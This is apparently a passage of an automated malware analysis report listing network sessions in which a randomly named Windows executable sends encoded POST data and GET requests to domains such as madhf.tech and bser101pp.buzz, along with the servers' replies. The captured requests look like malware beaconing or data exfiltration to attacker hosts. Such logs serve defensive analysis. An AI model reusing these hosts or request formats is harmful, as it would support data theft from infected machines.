                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.madhf.tech/6ou6/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4f 57 45 43 74 41 38 43 57 74 65 78 5a 66 4b 56 6b 66 48 56 42 4a 32 31 37 35 77 37 65 54 37 48 6d 66 72 38 7a 4a 56 2f 4b 67 50 45 41 6d 32 7a 44 79 30 79 50 58 4c 31 4b 35 74 70 30 41 36 2f 37 53 73 78 51 66 72 43 75 6d 37 68 6f 64 46 69 32 4d 68 45 35 4c 52 74 50 45 76 52 51 37 69 2f 4c 5a 41 6b 50 47 41 4c 51 2b 78 4a 4c 50 63 68 75 67 44 49 74 41 38 49 53 6a 48 50 6d 45 4f 36 44 59 42 4a 61 52 61 74 4e 72 4c 69 48 59 7a 4e 76 74 56 32 55 79 73 4a 69 53 53 4b 66 30 4d 50 6f 33 41 57 61 33 72 72 4d 77 34 72 41 49 31 33 2b 63 4a 7a 6d 47 33 67 52 65 71 38 5a 75 34 50 50 4a 68 58 6c 55 61 76 53 69 43 6f 43 69 64 79 2b 35 6e 38 4d 39 49 68 4e 46 32 73 74 4a 71 31 6c 53 45 56 75 37 2f 39 6f 48 71 53 57 44 77 73 4a 65 48 4c 75 35 46 4f 36 41 38 31 50 4e 62 32 5a 75 4a 4c 56 43 61 78 74 6d 62 46 4d 6a 33 64 58 46 56 34 78 48 4a 4b 66 45 2f 57 71 33 48 6a 45 54 66 45 55 72 71 44 73 44 49 30 75 52 71 61 70 59 35 41 47 49 47 50 33 73 51 4c 34 30 [TRUNCATED]
                                                                              Data Ascii: 6NVpdLF=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eT7Hmfr8zJV/KgPEAm2zDy0yPXL1K5tp0A6/7SsxQfrCum7hodFi2MhE5LRtPEvRQ7i/LZAkPGALQ+xJLPchugDItA8ISjHPmEO6DYBJaRatNrLiHYzNvtV2UysJiSSKf0MPo3AWa3rrMw4rAI13+cJzmG3gReq8Zu4PPJhXlUavSiCoCidy+5n8M9IhNF2stJq1lSEVu7/9oHqSWDwsJeHLu5FO6A81PNb2ZuJLVCaxtmbFMj3dXFV4xHJKfE/Wq3HjETfEUrqDsDI0uRqapY5AGIGP3sQL40HRBNNsiZ6yhbpBX0Gx7uzC2izWsQWyH2SIHijcJ7ag2967fLnXPilx2oTd1NVCkytqTLiMe4tWrZpujocbN7mrNkZ0VkFFTP+ciHrBEGfcupvN5/JXVwRJdpq6GzZDSb2fgS9mRp53lnmHxeIyfT2o3EcHUDiA6tATKAw5ETt+csUcCkviiuFN9WVxzXX+C6rehDWYV2pV5sONSiLws2IO5ChFov5p+qZ3Nwe/ZV1QjS34nfFowtZ+dsLYSMrERWUTfZTCe4SJ0+6WM6nHIBNtV5TdnyABwvuWe4k2gmY73KsIIfOPIx5TEeryZewBsoIPsgBIgK6TKnyASAsmV9t5PdHLqm2EJ8aVyKTZA7qTUCJZeuXDOqdqgacLrCg2KoyuS77OOPdCiNy9S6VOpgbFfyJ6sIkSv5qJV7Rnsyrmqc+jXpZ5BmeIldbhAhQOY1HI0/mWTuZTC5SzhVUwSOcfeKaSvzggdfwWqu1y4w3/wrA+S5G4GmFu/RfUfqGgwOaIWKxuMAIkDj+ynE8wasr1t6zQhZEZMm9MVsHve7xc7Jk3fElPc4sY7iM32sC+FKHtsh5xjpqWlCOjHdtqMZ3hz2p7FI8F9bDxawVI8DvvfgNpx4kk4dOglRzF1/0uEF/DtV8CiD3IC6pNxiOsu7ZmeRIP3zrN8FYa [TRUNCATED]
                                                                              Dec 2, 2024 14:44:15.869857073 CET871INHTTP/1.1 200 OK
                                                                              date: Mon, 02 Dec 2024 13:44:15 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1733147055.5887323; expires=Thu, 30-Nov-2034 13:44:15 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-encoding: gzip
                                                                              content-length: 576
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close
                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                                              Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.1049916103.224.182.242806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:17.193768024 CET353OUTGET /6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/Wjx9MdL3/Nu9eMgeVL6PZ2CHNoDSQ== HTTP/1.1
                                                                              Host: www.madhf.tech
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:44:18.467788935 CET1236INHTTP/1.1 200 OK
                                                                              date: Mon, 02 Dec 2024 13:44:18 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1733147058.6768786; expires=Thu, 30-Nov-2034 13:44:18 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-length: 1472
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 36 6f 75 36 2f 3f 5f 6a 56 78 3d 72 6c 56 30 5f 54 51 38 31 26 36 4e 56 70 64 4c 46 3d 57 65 37 32 6b 32 55 38 52 71 79 48 4e 78 39 63 30 6c 67 72 63 4d 61 6a 50 2b 37 50 79 64 50 6e 43 61 75 30 35 4b 51 4d 55 6a 57 6d 71 37 33 49 7a 75 70 46 64 52 47 64 64 6e 6d 58 43 53 52 64 4d 55 72 6b 47 4b 64 51 30 41 48 59 38 6a 42 49 55 63 2f 74 2f 57 6a 78 39 4d 64 4c 33 2f 4e 75 39 65 4d 67 65 56 4c 36 50 5a 32 43 48 4e 6f 44 53 51 3d 3d 26 27 3b [TRUNCATED]
                                                                              Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/Wjx9MdL3/Nu9eMgeVL6PZ2CHNoDSQ==&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text=
                                                                              Dec 2, 2024 14:44:18.467842102 CET508INData Raw: 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 36 6f 75 36 2f 3f 5f 6a 56 78 3d 72
                                                                              Data Ascii: "#000000"><div style='display: none;'><a href='http://www.madhf.tech/6ou6/?_jVx=rlV0_TQ81&6NVpdLF=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t/Wjx9MdL3/Nu9eMgeVL6PZ2CHNoDSQ==&fp=-3'>Click here to enter<


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.1049932172.67.158.106806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:24.162108898 CET622OUTPOST /v89f/ HTTP/1.1
                                                                              Host: www.bser101pp.buzz
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.bser101pp.buzz
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.bser101pp.buzz/v89f/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 51 61 45 52 37 58 6a 38 69 33 31 67 51 44 61 6a 45 7a 6b 68 38 53 48 68 59 45 59 68 2f 63 66 51 33 41 77 37 34 34 78 48 36 6a 65 7a 67 37 43 63 75 77 30 32 71 52 34 67 54 33 52 4e 6d 57 55 73 57 37 51 55 78 31 5a 45 32 59 6f 35 68 68 33 47 54 33 54 75 55 58 36 67 47 35 66 45 39 71 6d 59 48 7a 74 45 34 56 2b 64 48 34 6f 66 5a 71 69 5a 67 36 6e 7a 6f 44 2f 75 43 71 7a 4f 50 36 51 37 62 42 46 64 75 6b 68 55 4b 2b 64 57 4c 78 56 32 39 58 50 70 30 58 55 75 6f 50 72 54 79 42 79 73 53 63 69 55 57 78 43 55 4a 4e 4d 38 47 5a 36 62
                                                                              Data Ascii: 6NVpdLF=iTfEV/Gi0JnQQaER7Xj8i31gQDajEzkh8SHhYEYh/cfQ3Aw744xH6jezg7Ccuw02qR4gT3RNmWUsW7QUx1ZE2Yo5hh3GT3TuUX6gG5fE9qmYHztE4V+dH4ofZqiZg6nzoD/uCqzOP6Q7bBFdukhUK+dWLxV29XPp0XUuoPrTyBysSciUWxCUJNM8GZ6b
                                                                              Dec 2, 2024 14:44:25.368513107 CET974INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:44:25 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNOKCjlPdwE%2FWPwY%2Fb38CilvJz6z9stpCoCA1NitIsgqppTexqMbRrA7UXSzMTmmfhAQvUnz10vk8K9akxmIR5tvE4s4Swawkcw2dMR%2BaArDznJlI6pMsMMl4bDghQxnFBMFBUs%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ebbc064eec2f793-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1477&rtt_var=738&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=622&delivery_rate=0&cwnd=125&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.1049939172.67.158.106806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:26.817049026 CET646OUTPOST /v89f/ HTTP/1.1
                                                                              Host: www.bser101pp.buzz
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.bser101pp.buzz
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.bser101pp.buzz/v89f/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 57 35 73 52 35 32 6a 38 6c 58 31 6a 66 6a 61 6a 4f 54 6b 6c 38 53 44 68 59 46 63 78 2b 75 4c 51 30 68 41 37 69 35 78 48 32 44 65 7a 34 4c 44 57 77 41 30 39 71 52 30 53 54 7a 52 4e 6d 57 41 73 57 35 59 55 77 43 4e 48 32 49 6f 37 74 42 33 41 4f 6e 54 75 55 58 36 67 47 35 4c 75 39 75 4b 59 48 44 64 45 71 67 43 63 63 59 6f 63 65 71 69 5a 33 71 6e 33 6f 44 2f 49 43 72 76 67 50 35 6f 37 62 41 31 64 75 51 56 4c 66 4f 64 63 50 78 55 6c 2b 6c 47 53 32 46 4d 41 68 4f 44 77 67 33 6d 4f 63 64 66 54 48 67 6a 44 61 36 51 79 49 66 50 78 4b 52 59 52 6a 4f 32 56 71 6b 65 4b 62 71 46 53 78 78 76 32 59 51 3d 3d
                                                                              Data Ascii: 6NVpdLF=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uLQ0hA7i5xH2Dez4LDWwA09qR0STzRNmWAsW5YUwCNH2Io7tB3AOnTuUX6gG5Lu9uKYHDdEqgCccYoceqiZ3qn3oD/ICrvgP5o7bA1duQVLfOdcPxUl+lGS2FMAhODwg3mOcdfTHgjDa6QyIfPxKRYRjO2VqkeKbqFSxxv2YQ==
                                                                              Dec 2, 2024 14:44:27.994410992 CET972INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:44:27 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANfFGu7HhnZumRkzORjZnS9TSgw1HNt3h4WprfQ5EsPByNfdrGQfQ2Q2z5v%2FCfIqamuxFz4N1amkiLIWLMi6Y09gQ%2BNqyA8DwSoIBwVZiF7Kru9SMFocUs9lwwvMYbFf64IH6B4%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ebbc0755d2141c3-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2205&min_rtt=2205&rtt_var=1102&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=646&delivery_rate=0&cwnd=70&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.1049945172.67.158.106806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:29.473859072 CET1659OUTPOST /v89f/ HTTP/1.1
                                                                              Host: www.bser101pp.buzz
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.bser101pp.buzz
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.bser101pp.buzz/v89f/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 57 35 73 52 35 32 6a 38 6c 58 31 6a 66 6a 61 6a 4f 54 6b 6c 38 53 44 68 59 46 63 78 2b 75 54 51 30 54 49 37 34 61 5a 48 33 44 65 7a 31 72 44 56 77 41 30 67 71 56 59 73 54 7a 56 64 6d 55 34 73 58 63 4d 55 67 67 31 48 34 49 6f 37 77 78 33 42 54 33 53 73 55 58 71 73 47 35 62 75 39 75 4b 59 48 46 78 45 70 31 2b 63 62 6f 6f 66 5a 71 69 64 67 36 6e 54 6f 44 57 7a 43 71 62 65 50 4a 49 37 61 67 6c 64 31 46 68 4c 44 65 64 53 4b 78 56 69 2b 6c 61 4e 32 46 51 4d 68 4f 47 66 67 77 71 4f 66 59 69 57 43 52 50 49 4c 36 42 6d 4a 4d 4c 37 4a 47 45 76 6c 2f 72 39 68 56 65 64 49 4b 51 6e 2f 44 44 38 50 43 44 33 61 30 36 6b 44 2b 41 6e 66 42 69 72 2f 69 58 76 46 4b 47 31 34 5a 75 51 69 38 50 4c 50 61 53 79 32 75 79 6e 48 61 71 55 70 32 45 41 38 64 75 43 30 68 41 39 61 64 6e 62 46 4c 42 66 65 51 67 6e 62 52 51 6c 6f 4c 46 41 58 73 77 50 71 49 75 39 35 33 53 4f 6a 47 47 67 4a 68 76 68 74 37 4a 36 37 68 4d 44 43 50 33 65 4c 4d 35 46 43 46 51 6f 6d 59 47 45 32 64 [TRUNCATED]
                                                                              Data Ascii: 6NVpdLF=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uTQ0TI74aZH3Dez1rDVwA0gqVYsTzVdmU4sXcMUgg1H4Io7wx3BT3SsUXqsG5bu9uKYHFxEp1+cboofZqidg6nToDWzCqbePJI7agld1FhLDedSKxVi+laN2FQMhOGfgwqOfYiWCRPIL6BmJML7JGEvl/r9hVedIKQn/DD8PCD3a06kD+AnfBir/iXvFKG14ZuQi8PLPaSy2uynHaqUp2EA8duC0hA9adnbFLBfeQgnbRQloLFAXswPqIu953SOjGGgJhvht7J67hMDCP3eLM5FCFQomYGE2dvaG5mRYsHBQihFb3p3W2jezpBR7aCqqew2WkkXtoiholR9tSi0j+3J+rH6Qlan1F8lXD5OkDFfl+Tm8CZPxngVLTIVW4XTUO8EuGfjfPhrrLQffSsUBYq7rGm9R8MIbkcoFtej2DenAJoMnm4JyzAJRB8o6/w/ITi9C49FjChUZmz6BchxcFWP5vXZROy8VbalFQKZLRPPPIuEZiHN+XK6v1M/uNQpej1I5tZHFbeTWH3OMeb5bwZql70c0/I/Yju3NrWDsPYwj0KezTgTt0b0AarzHZ5JiXW8IDndd1fYrq9JHu46wVRf3WqS+3juqt9VedDEuOnl4PvQAlAK3LmelJBai7+hWKKz+oYnnEHm0zXFyiWEpqzBQb1dC0Vc3DhEZP1mPkN8qLUMZbCaGS0ERYPMUJ2JZxdbDcV4Mx569DO8fwJdWFktIDN/dSSwcxmaCdfMD4LKE0mGxRhuFJ4tdL78lvM8+EuQEPddTGsAPDLjcO6Ah2Rq+kHrBT2QnBsxMgfAV52c7htDGfUjThBeomPgc2vaE4IdVS3i7YUvVjrzTN54oZTndS4OExgPWMkEMGYxwZjGC4TYOze3R2l5r7ySleTTttpz/f13caBRUrYdWAEPhLeu2AwHZmC2nLmfPunn1m7Nj2Gj0zQlJCtKphxLrp5jwC82 [TRUNCATED]
                                                                              Dec 2, 2024 14:44:30.642689943 CET976INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:44:30 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eH7Ad%2BIWLbwnMZL8Ric5%2FivIRXo0jPbWyv5DHW2vUH9PqS8ZIy8Z7jQXngurnukTBxJ%2BMEXKom2p0c6aavxnIFXdPgCho4c1AZibPftZ7pZuEIWCI1ruKNM7V7rNSbosZToRDFM%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ebbc085e8a38c4d-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2023&rtt_var=1011&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1659&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.1049952172.67.158.106806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:32.132716894 CET357OUTGET /v89f/?6NVpdLF=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9kwLEpkgrXXmS6Zwq+X4n7/LWdMx9Q7w==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.bser101pp.buzz
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:44:33.346755981 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:44:33 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tn7aZzDRaom%2B5MRerP01lE%2FLZ7ggAbDVK7SDbJsz7rXguARlrgm%2BiuAkrrzCVi4JBhH6MjmQ0U%2F%2Bf9w7T0A9v5e6Tp2wmBfI924Dmscd7K4IntEV795bJhCHfogLqJp2%2BfbEeL0%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ebbc096df771895-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1483&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=357&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
